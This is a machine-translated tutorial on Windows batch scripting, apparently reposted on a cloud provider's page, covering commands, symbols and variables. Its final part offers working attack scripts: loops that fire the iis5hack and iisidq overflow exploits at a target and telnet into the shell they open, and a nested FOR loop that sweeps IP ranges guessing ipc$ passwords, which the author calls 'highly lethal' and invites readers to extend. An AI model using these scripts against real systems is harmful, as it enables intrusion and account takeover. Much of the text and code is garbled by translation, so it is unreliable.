Master Batch Processing tutorial batch processing from entry to master

Source: Internet
Author: User
Tags echo message eol

Recently, many viruses with weak passwords have become popular on the Internet. For example, the Worm. Dvldr Worm, which has been very popular some time ago, is a typical one. One thing these viruses have in common is the use of batch processing for the ipc $ connection, so as to guess the Administrator's password to control the server. A virus consists of several files and several complex batches. Batch processing is not really a programming, but some of its ideas are similar to programming. Through online communication with some beginner friends, I found that they are very interested in batch processing, more or less familiar with some command usage, but lack of a more systematic understanding, so I wrote this tutorial specially, so that interested friends can have a general understanding of batch processing, and can write their own batch processing through this tutorial.

This tutorial consists of four parts: The first part is the dedicated Command for batch processing, the second part is the special symbol and batch processing, the third part is the batch processing and variable, and the fourth part is the complete case. Because the tutorial is long, we will be divided into two serialization sessions in the magazine. In this issue, we will first publish one or two sections. Please note that.

Part 1: dedicated commands for Batch Processing

A batch file is a collection of commands in a certain order into an executable text file with the extension BAT. These commands are collectively called batch processing commands. Next I will introduce the batch processing commands.
1. REM
REM is a comment command which is generally used to add annotations to the program. The content after the command will not be displayed and executed during program execution. Example:
REM, what you see now is the annotation. This sentence will not be executed. The content explained in subsequent examples will be placed after REM. Please note.
ECHO is a ECHO command. The main parameters include OFF and ON. Generally, ECHO message is used to display a specific message. Example:
Echo off
Rem and above indicate that the ECHO is disabled and the executed command is not displayed.
Echo: this is the message.
Rem and above indicate that "this is the message" is displayed.
Execution result:
This is the message.
GOTO indicates the jump. In batch processing, you can use ": XXX" to construct a label and then use the GOTO: Label to directly execute the command after the label. Example
Above REM is the LABEL.
Dir c :\
Dir d :\
The above program jumps to the LABEL and continues execution.
The CALL command can CALL another batch during batch processing. After another batch is executed, the original batch processing will continue. Example:
Batch Processing 2. BAT content is as follows:
ECHO. This is the content of 2.
Batch Processing 1. BAT content is as follows:
ECHO: This is 1.
ECHO 1 and 2 are displayed completely
The execution result is as follows:
C: \> 1.BAT
This is the content of 1.
This is the content of 2.
The content of 1 and 2 is displayed completely.
PAUSE stops the execution of system commands and displays the following content. Example:
Press any key to continue...
6. IF
IF condition judgment statement, the syntax format is as follows:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1 = string2 command
IF [NOT] EXIST filename command
[NOT] returns the reverse value of the returned result, that is, "If NOT.
ERRORLEVEL is the exit value returned after the command is executed.
The Number of the exit value ranges from 0 ~ 255. The order of values should be large to small. When the returned value is greater than or equal to the specified value, the condition is true.
String1 = string2 string1 and string2 are both character data. The case sensitivity of English characters is different. The equal sign in this condition must be two (absolutely equal) characters ), execute the command
EXIST filename indicates the existence of a file or directory.
The if errorlevel statement must be placed after a command. After the command is executed, if errorlevel is used to determine the return value of the command.
1. IF [NOT] ERRORLEVEL number command
Checks the return value after the command is executed.
Echo off
Dir z:
If the exit code is 1 (unsuccessful), rem jumps to Title 1 for execution.
If errorlevel 1 goto 1
If the exit code is 0 (successful), rem jumps to the title 0 for execution.
If errorlevel 0 goto 0
: 0
Echo Command executed successfully!
After the Rem program is executed, jump to the title exit and exit.
Goto exit
: 1
Echo command execution failed!
After the Rem program is executed, jump to the title exit and exit.
Goto exit
: Exit
Rem is the exit of the program.
2. IF string1 = string2 command
Checks the value of the current variable to make a judgment.
IF % 1 = 2 goto no
Echo variables are equal!
Goto exit
: No
Echo variables are not equal
Goto exit
: Exit
You can see the effect as follows: C: \> test. bat number
3. IF [NOT] EXIST filename command
Identify specific files to make judgments
Echo off
IF not EXIST autoexec. bat goto 1
Echo file exists successfully!
Goto exit
: 1
Failed to exist echo file!
Goto exit
: Exit
This batch processing can be performed on disk C and disk D to see the effect.
The FOR command is a special command to execute the command cyclically. At the same time, the FOR command can also be used in the loop. In this article, we will introduce the basic usage and will not apply the loop. We will explain the apply loop later. The FOR command in batch processing is as follows:
FOR [% c] IN (set) DO [command] [arguments]
The command in the command line is as follows:
FOR [% c] IN (set) DO [command] [arguments]
Common parameters:
/L this set indicates a sequence of numbers starting from the beginning to the end in incremental form. Therefore, (, 5) will generate a sequence 1 2 3 4 5, (5,-) will generate a sequence (5 4 3 2 1 ).
/D if the set contains wildcards, it is specified to match the directory name instead of the file name.
/F read data from the specified file as a variable
Eol = c-refers to the end of a line comment character (just one)
Skip = n-indicates the number of rows ignored at the beginning of the file.
Delims = xxx-refers to the delimiter set. This replaces the default delimiter set of spaces and the hop key.
Tokens = x, y, m-n-indicates which symbol of each row is passed to the for itself of each iteration. This leads to the allocation of additional variable names. The m-n format is a range. Use the nth symbol to specify mth. If the last character asterisk in the symbol string is used, the additional variable is allocated and the reserved Text of the row is accepted after the last symbol is parsed.
Usebackq-specify that the new syntax is used in the following situations: execute a character string enclosed in quotation marks as a command and use single quotation marks as a text string command, and enameset allows you to use double quotation marks to expand the file name.
Here is an example:
FOR/F "eol =; tokens = 2, 3 * delims =," % I in (myfile.txt) do @ echo % I % j % k
Analyzes each row in myfile.txt, ignores the rows whose names start with semicolons, and passes the second and third symbols in each row to the for program body. Use commas and/or spaces to define the delimiter. Note that the for program body statement references % I to get the second symbol, and references % j to get the third symbol, reference % k to get all the remaining symbols after the third symbol. For file names with spaces, you must enclose them in double quotation marks. To use double quotation marks in this way, you also need to use the usebackq option. Otherwise, double quotation marks are interpreted as defining a string to be analyzed.
% I is specifically described in the for statement. % j and % k are specifically described through the tokens = option. You can use tokens = to specify a maximum of 26 characters in a row. If you do not try to illustrate a variable higher than the letter 'Z' or 'Z. Remember that FOR variable names are case-sensitive and common. Moreover, no more than 52 variables are in use.
You can also use FOR/F to analyze the logic on adjacent strings. The method is to enclose the filenameset between parentheses with single quotation marks. In this way, the string is treated as a single input line in a file. Finally, you can use the FOR/F command to analyze the command output. The method is to convert the filenameset between parentheses into an anti-string. This string will be passed to a sub-CMD. EXE as a command line, and its output will be captured into the memory and analyzed as a file. Therefore, the following example:
FOR/F "usebackq delims =" % I IN ('set') DO @ echo % I
The names of environment variables in the current environment are enumerated.
The following is a simple example to illustrate the difference between/L and no parameter:
Delete the 1.TXT 2.TXT 3.TXT 4.TXT 5.TXT File
FOR/L % f in (1, 1, 5) do del % F. TXT
FOR % f in (1, 2, 3, 4, 5) do del % F. TXT
The execution results of the preceding two commands are the same as follows:
C: \> DEL 1.TXT
C: \> DEL 2.TXT
C: \> DEL 3.TXT
C: \> DEL 4.TXT
C: \> DEL 5.TXT
Start localization of Environment Changes in the batch file. After SETLOCAL is executed
The environment changes are limited to batch files. To restore the original settings, you must execute
Row ENDLOCAL. When the end of a batch file is reached
If the SETLOCAL command is not executed, an implicit ENDLOCAL is
Run. Example:
Set path/* view the environment variable PATH
Set path = E: \ TOOLS/* reset the environment variable PATH
From the above example, we can see that the environment variable PATH is the default PATH of the system when it is displayed 1st times. E: \ TOOLS is displayed as E: \ TOOLS. However, when ENDLOCAL is used, we can see that it is restored to the default path of the system. However, this setting only works when the batch processing is running. After the batch processing is completed, the environment variable PATH will be restored.
The SHIFT command allows more than 10 commands on the command to be used (% 0 ~ % 9) Examples of the above replaceable parameters:
ECHO % 1% 2% 3% 4% 5% 6% 7% 9
ECHO % 1% 2% 3% 4% 5% 6% 7% 9
ECHO % 1% 2% 3% 4% 5% 6% 7% 9
The execution result is as follows:
C: \> SHIFT. BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
The above are nine batch processing commands Based on WIN2000.
Part 2: special symbols and Batch Processing
Some symbols in the command line are not allowed, but some symbols have special meanings.
1. symbol (@)
@ In batch processing, the echo of the current row is disabled. We know from the above that the echo off command can be used to turn off the echo of the entire batch processing command, but the echo off command cannot be displayed. Now we add @ before this command so that the echo off command will be shut down by @ echo so that all commands will not be returned.
2. symbol (>)
> Indicates passing and overwriting. The function is to pass the echo result after running to the following range (the file is also the default system console). For example:
The content of file 1.txt is:
1 + 1
Run the c: \> dir *. txt> 1.txt command.
The contents of the 1.txt file are as follows:
The volume in drive C is not labeled.
The serial number of the volume is 301A-1508.
C: \ directory
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
18,630,070 bytes for five files
0 directories, 1,191,542,784 available bytes
> Overwrite the original file content with the command execution result.
When passed to the console, the program will not have any echo (Note: echo here is not the same as echo off. Echo off is the Echo of the input command. The Echo here is the Echo of the program execution or after) Example:
C: \> dir *. txt> nul
The program will have no display and no trace.
3. symbol (>)
The role of symbol> is similar to that of symbol>, but the difference between them is> transfer and append at the end of the File> You can also pass the echo to the console (usage is the same as above). Example:
File 1.txt is the same:
1 + 1
Run the c: \> dir *. txt> 1.txt command.
The contents of the 1.txt file are as follows:
1 + 1
The volume in drive C is not labeled.
The serial number of the volume is 301A-1508.
C: \ directory
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
18,630,070 bytes for five files
0 directories, 1,191,542,784 available bytes
> Overwrite the command execution result after the original file content.
4. symbol (|)
| A pipeline transmission command means to pass the result of the previous command execution to the next command for processing. Example:
C: \> dir c: \ | find "1508"
The serial number of the volume is 301A-1508.
The preceding Command finds all c: \ and finds the 1508 string. Use Find /? View by yourself
When the format parameter is not used, I used this method to automatically format the disk.
Echo y | fornat a:/s/q/v: system
Anyone who has used the format Command knows that the format has an interactive conversion process. The user needs to input y to determine whether the current command is executed. Add echo y to the command and use the pipeline transport character | pass echo execution result y to format to achieve manual input of y (this command is harmful, please be careful when testing)
5. symbol (^)
^ Is the leading character of special symbols>, <, &, and. In the command, he removes the special kinetic energy of the above three symbols. Just think of them as symbols instead of their special meanings. Example:
C: \> echo test ^> 1.txt
Test> 1.txt
From the examples, we can see that testtestis not written into the file 1.txt, but test> 1.txt is displayed as a string. This symbol is very effective in remote batch building.
6. Symbols (&)
The & symbol allows more than two different commands to be used in one line. If the First Command fails to be executed, the execution of the 2nd commands will not be affected. Example:
C: \> dir z: \ & dir y: \ & dir c :\
The preceding command will consecutively display the z: y: c: Content in the drive, regardless of whether the drive letter exists.
7. Symbols (&&)
The & Symbol also allows more than two different commands to be used in one line. When the first command fails to be executed, subsequent commands will not be executed. Example:
C: \> dir z: \ & dir y: \ & dir c :\
The preceding command will prompt you to check whether the disk exists. If the disk exists, run the command. If the disk does not exist, stop executing all subsequent commands.
8. symbol ("")
The "" symbol can contain spaces in a string. You can use the following method to enter a special directory:
C: \> cd "Program Files"
C: \> cd progra ~ 1
C: \> cd pro *
All of the above methods can go to the Program Files directory.
9. symbol (,)
The symbol is equivalent to a space. In some special cases, it can be used instead of spaces. Example:
C: \> dir, c :\
10. symbol (;)
The symbols can be used to separate different targets when the commands are the same, but the execution effect remains unchanged. If an error occurs during execution, only the error report is returned, but the program continues to execute. Example:
Dir c: \; D: \; E: \ F :\
The preceding command is equivalent
Dir c :\
Dir d :\
Dir e :\
Dir f :\
Of course, there are still some special symbols, but their use range is very small and I will not explain them here one by one.
Part 3: Batch Processing and variable
Appropriate variable references in batch processing will make your program more widely applied. The number of variables that can be processed by batch processing ranges from % 0 ~ % 9: 10 in total. % 0 is used by default for batch file names. % 0 can be replaced by % 1 unless SHIFT command is used. For example, if you add % 0 before % 1, the result is as follows:
C: \> SHIFT. BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT. BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How does the system differentiate each variable? The rules for distinguishing variables are spaces in the middle of a string, that is, if space is found, the character before the space is treated as a variable, and the character after the space is used as another variable. If your variable is a long directory name that contains spaces, You Need To enclose it with the quotation marks in the previous special symbol 8. Example:
Batch Processing content:
ECHO % 1
ECHO % 2
ECHO % 3
Enter the following command:
C: \> TEST "Program Files" Program Files
Program Files
In a complex batch processing, more than 10 variables may be used at the same time, which will conflict with the system rules. How can this problem be solved? There is also an environment variable in the system (you can use the SET command to view the environment variables of the current system), such as the current system directory is % windir % or % SystemRoot %. When more than 10 parameters are used at the same time, we can save some variables to be called in subsequent programs as environment variables. The specific usage is as follows: set a = % 1. In this way, we name A new environment variable A. When we call variable A, we need to call it by % A %. The environment variable is not affected by the SHIFT command. To change an environment variable, you must set it again. Of course, you can also transfer between variables to achieve the goal. Let's take an example. The batch processing is as follows:Copy codeThe Code is as follows: ECHO OFF
Set pass = % 1
SET PASS1 = % 1
ECHO % PASS % PASS1 % 1% 2% 3% 4% 5% 6% 7% 8% 9
Set pass = % PASS1 % variable Transfer
SET PASS1 = % 9

Run the command: C :\> test a B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K Note: This line shows 11 variables
A B L after three shifts are used, % 9 is changed to L
Result After B L variable Transfer

Part 4: complete cases
The above are some batch processing usage. Now let's take a closer look at the Batch Processing Methods released on the Internet to see how they work. Here I will list three examples for detailed analysis. To keep the program complete, my comments will be added after.
Example 1
This example uses iis5hack.exe to batch handle overflow of hosts with. printer vulnerabilities. Iis5hack.exeand telnet.exe are used. Iis5hack command format:
Iis5hack <target ip address> <target port> <target version> <overflow connection port> the 10 numbers with the target version 0-9 correspond to the system versions of different languages and sp respectively, the command format used for batch processing is <iis. bat target ip (Start version number)> Start version number is optional. The program is as follows.Copy codeThe Code is as follows: @ echo off/* close the command echo
If "% 1%" = "" goto help/* determines whether % 1 is null and % 1 is the target ip
If "% 2%" = "1" goto 1/* determines whether % 2 is 1. if it is 1, the jump flag 1
If "% 2%" = "2" goto 2/* % 2 is the start version.
If "% 2%" = "3" goto 3/* if yes, the execution starts from the matched place.
If "% 2%" = "4" goto 4
If "% 2%" = "5" goto 5
If "% 2%" = "6" goto 6
If "% 2%" = "7" goto 7
If "% 2%" = "8" goto 8
If not EXIST iis5hack.exe goto file/* if no iis5hack.exe is found, the file segment of the flag is executed.
Ping % 1-n 1 | find "sent Ed = 1"/* ping the target once. The result shows that the sent Ed = 1.
If errorlevel 1 goto error/* if the returned code is 1, execute the error segment (Code 1 indicates that no 0 is found, and the error segment is successfully executed)
Iis5hack % 1 80 9 88 | find "good"/* start to overflow the target port 80 System Code 9 after the overflow, the connection port 88 finds the string "good" in the execution result (only after the overflow is successful there will be a string of good)
If not errorlevel 1 goto telnet/* if there is no error code 1 (overflow successful), execute the content of the telnet segment.
Echo operating system type 9 failed! /Otherwise, this sentence is displayed.
: 8/* the following code content can be found above
Iis5hack % 1 80 8 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 8 failed!
: 7
Iis5hack % 1 80 7 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 7 failed!
: 6
Iis5hack % 1 80 6 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 6 failed!
: 5
Iis5hack % 1 80 5 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 5 failed!
: 4
Iis5hack % 1 80 4 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 4 failed!
: 3
Iis5hack % 1 80 3 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 3 failed!
: 2
Iis5hack % 1 80 2 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 2 failed!
: 1
Iis5hack % 1 80 1 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 1 failed!
: 0
Iis5hack % 1 80 0 88 | find "good"
If not errorlevel 1 goto telnet
Echo operating system type 0 failed!
Goto error
: Telnet
Telnet % 1 88/* start to connect to port 88 of the target ip Address
Goto exit/* jump to the exit segment after the connection is interrupted
: Error/* the error section displays the help information after the error.
Echo may be unable to connect to the network or the other party to fix this vulnerability! Please try it manually in the following format!
Echo iis5hack [target IP address] [WEB port] [system type] [open port]
ECHO Chinese: 0
ECHO Chinese + sp1: 1
ECHO English: 2
ECHO English + sp1: 3
ECHO Japanese: 4
ECHO Japanese + sp1: 5
ECHO Korean: 6
ECHO Korean + sp1: 7
ECHO in Mexico: 8
ECHO Mexican + sp1: 9
Goto exit/* jump to exit
: File/* the file segment shows no information found in the file.
Echo file iis5hack.exe not found! The program stops running!
Goto exit/* jump to exit
: Help/* help section shows the help format of the batch processing
Echo iis [target ip address]
Echo iis [target ip address] [Starting number 9-0]
: Exit/* exit is the program exit

There is basically no loop in this batch processing. So the code is not difficult!
Example 2
In this example, iisidq.exe is used to batch process instances with idq vulnerabilities. Iisidq.exeand telnet.exe are used. Iisidq.exe is used as follows:
Running parameters: operating system type Destination Address web port 1 Overflow listening port <enter command 1>
If no command parameter is input, the default value is "cmd.exe ".
The Code Range of the operating system type is 0-14. The command format used for batch processing is <idq. bat target ip address> as follows:Copy codeThe Code is as follows: @ echo off/* same example 1
If not EXIST iisidq.exe goto file/* same example 1
If % 1 = "" goto error/* same example 1
Ping % 1-n 1 | find "Received = 1"/* same example 1
If errorlevel 1 goto error1/* same example 1
Set B = % 1/* Create an environment variable B and pass the content of the variable % 1 to environment variable B. The content of variable B will be the target ip address later
Set a = 0/* Create an environment variable a and specify the environment variable a as 0. Because the entire batch processing cycle is used, a is used as the counter.
: No/* start with no
If % a % = 0 set d = 0/* if environment variable a = 0, create environment variable d and set environment variable d = 0.
If % a % = 1 set d = 1/* Environment Variable d is actually the operating system type code, and it is controlled by counters.
If % a % = 2 set d = 2/* changes.
If % a % = 3 set d = 3
If % a % = 4 set d = 4
If % a % = 5 set d = 5
If % a % = 6 set d = 6
If % a % = 7 set d = 7
If % a % = 9 set d = 9
If % a % = 10 set d = 13
If % a % = 11 set d = 14
Goto 0/* after the variable is passed, go to sign 0 to run
: 1
Echo is executing item % d %! Cannot connect to target % B %! Attempting to connect... please wait ......
: 0/* Indicates 0 to start
IISIDQ % d % B % 80 1 99 | find "good"/* Send the overflow command in the format and find the string "good" in the result (the string "good" is displayed only when the code is successfully sent)
If errorlevel 1 goto 1/* if there is no good string, no jump is sent
/* Try again at mark 1
Ping 8> nul/* ping yourself 8 times, which is equivalent to a delay of 8 seconds without executing
/* Row result
Echo is executing item % d %! /* Type of Operating System Reporting Overflow
Telnet % B % 99/* connection overflow Port
Echo./* display a blank line
If % d % = 14 goto error1/* if the operating system type is 14, jump to error1 (loop Exit)
If % d % = 13 set a = 11/* start to reattach the value to the operating system code with the counter
If % d % = 9 set a = 10
If % d % = 7 set a = 9
If % d % = 6 set a = 7
If % d % = 5 set a = 6
If % d % = 4 set a = 5
If % d % = 3 set a = 4
If % d % = 2 set a = 3
If % d % = 1 set a = 2
If % d % = 0 set a = 1
Goto no/* Add a value to complete the no-segment jump execution
: File/* the following are the help prompts after an error
Echo IIsidq.exe not found! Put this file in the same directory as this file!
Goto exit
: Error
Echo error! The target ip address cannot be identified! Use the following format to connect!
Echo idq [target IP address]
Goto exit
: Error1
Echo connection failed! This vulnerability or network fault may have been fixed on the target machine!
Please try echo in the following format!
Echo iisidq [target type] [target IP address] [target port] [connection mode] [overflow port]
Echo telnet [target ip address] [overflow port]
: Exit/* exit of the entire program

This batch processing adopts the overall cycle to master the counter and then master the batch processing.

Example 3

For/l % a in (255, 255) do for/l % B in (254,) do for/l % c in) do for/f "tokens = 1, 2 *" % e in (userpass.txt) do net use \ % 1. %. % B. % c \ ipc $ % e/u: % f
The preceding command is one. We can see that this command uses four FOR to apply. Usage: C: \> TEST. the first character in BAT 218 contains the second character of the password % e as the username % f and finally executes the command (here I include all the above values, set the password to 123 and the user name to abc)
Net usr \ \ ipc $123/u: abc
Of course, some of the above examples may be too simple and inflexible. I have made some modifications to this example (for the complete file, see the CD ipc. bat). You can check it by yourself if you are interested. The modified program can flexibly search for the range from start to end or from start to maximum ip address. Of course, the function can be enhanced. It's up to you to see if you can become a new tool.
This loop is a little bigger, mainly because it is difficult to replace the numbers of ip addresses. I will not write comments for this batch processing. Please refer to the above content and you will soon understand this batch processing. Do not make it easy to understand! At least this is a batch process that can detect and save weak passwords without any third-party tools !! A simple change is still highly lethal. The biggest advantage of all the above batch processing tests passed in win2000 and xp is that there is only one batch processing file and there is no false alarm. The disadvantage is that it is too long!

The syntax for batch processing is actually very simple, but it needs to be used flexibly. I hope this tutorial will allow everyone to use batch processing in the future, and some basic problems can be solved by their own capabilities. In this way, my goal is achieved !! Haha! Everyone is happy.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.